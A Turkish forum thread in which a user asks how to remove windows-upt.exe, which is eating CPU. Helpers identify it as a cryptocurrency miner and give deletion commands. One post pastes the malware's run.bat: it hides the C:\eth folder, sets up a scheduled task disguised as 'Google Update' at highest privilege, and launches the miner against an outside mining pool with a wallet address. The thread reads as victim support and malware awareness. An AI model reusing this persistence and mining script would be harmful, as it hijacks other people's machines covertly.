Windows-Upt.Exe Virüs Nasıl Kurtulabilirim ?
-
Arkadaşlar merhaba,
Normalde kendi problemlerimi çözebiliyordum fakat artık bu konu beni pes ettirdi. 2 gündür uğraşmama rağmen bir sonuç alamadım. Konu şu ki; Bilgisayar herhangi bir program açılmasa da inanılmaz derecede kasıyor. Görev yöneticisini açınca windows-upt.exe adlı bir program %40 gibi bir miktarla CPU kullanıyor. Bunun yanında WMI x64 Helper adlı bir şey daha mevcut. Görevi sonlandır dediğim zaman pc rahatlıyor fakat 3 - 5 dk sonra yine çalışmaya başlıyor. Dosya konumu site C:/eth şeklinde fakat öyle bir klasör de görünmüyor.
Kaspersky 2016, CCLeaner, COMODO ve Zemana gibi programların tüm tarama yollaroyla tarattım. Bir kaç virüs buldu sildim ama sonuç aynı.
Format dışında çözümlerinizi bekliyorum.

-
Büyük ihtimalle bu bitcoin miner. O yüzden antivirüs programları zararlı olarak algılamıyor. Tabi emin değilim görmeden.
Güvenli modda bilgisayarı açıp yönetici komut satırını çalıştır. Orada
attrib -r -h -s c:\eth\*.*
del c:\eth\*.*
attrib -r -h -s c:\eth
rmdir eth
komutlarını sırayla çalıştır. Son olarak "Zamanlanmış görevler"den bu klasör altındaki uygulamayı çalıştıran tüm girdileri sil.
-
Mission Completed!
-
SerYolcu bunu yazdı
Mission Completed!
Ellerine sağlık hocam. Olay çözüme kavuşmuştur.
-
YeniHarman ın bilgisi olması açısından buraya virüsten bir kaç parça koyalım.. :)
-----
run.bat içeriği
cd c:\eth
attrib +s +a +h c:\eth
attrib +s +a +h c:\eth\*
SchTasks /Create /SC MINUTE /mo 5 /TN "Google Update" /TR "wscript.exe C:\eth\a.vbs C:\eth\run.bat" /IT /F /RL HIGHEST
setx GPU_FORCE_64BIT_PTR 0
setx GPU_MAX_HEAP_SIZE 100
setx GPU_USE_SYNC_OBJECTS 1
setx GPU_MAX_ALLOC_PERCENT 100
setx GPU_SINGLE_ALLOC_PERCENT 100
tasklist /FI "IMAGENAME eq windows-upt.exe" 2>NUL | find /I /N "windows-upt.exe">NUL
IF "%ERRORLEVEL%" EQU "1" (
windows-upt.exe -s mine.guardia.us:4444 -u 0xB9D43FfcfE70411bBDaf336F71610c382f5989F2.g1proxy -G -t 2 --opencl-platform 0
windows-upt.exe -s mine.guardia.us:4444 -u 0xB9D43FfcfE70411bBDaf336F71610c382f5989F2.g2proxy -G -t 2 --opencl-platform 1
windows-upt.exe -s mine.guardia.us:4444 -u 0xB9D43FfcfE70411bBDaf336F71610c382f5989F2.cproxy -t 1
)
pause----
-
Bende de aynı sorun vardı hocam hallettim
http://www.tahribat.com/forum/windows-10-fileceth-dizini-lazim-221575/2#msg2773474
-
hipokondriyak bunu yazdı
Bende de aynı sorun vardı hocam hallettim
http://www.tahribat.com/forum/windows-10-fileceth-dizini-lazim-221575/2#msg2773474
Geçmiş olsun hocam. Bela birşey. Bunalttı 2 gündür. Hallettik çok şükür.
-
SerYolcu bunu yazdı
YeniHarman ın bilgisi olması açısından buraya virüsten bir kaç parça koyalım.. :)
Adobe crack mı sizdeki bulaşan kaynak?
-
YeniHarman bunu yazdıSerYolcu bunu yazdı
Tahmini konuşuyorum; win 8.1 pro crack
-
YeniHarman bunu yazdıSerYolcu bunu yazdı
aynen o bırtane orospu cocugunun sıtesınden ındırdım o sekılde bulaştı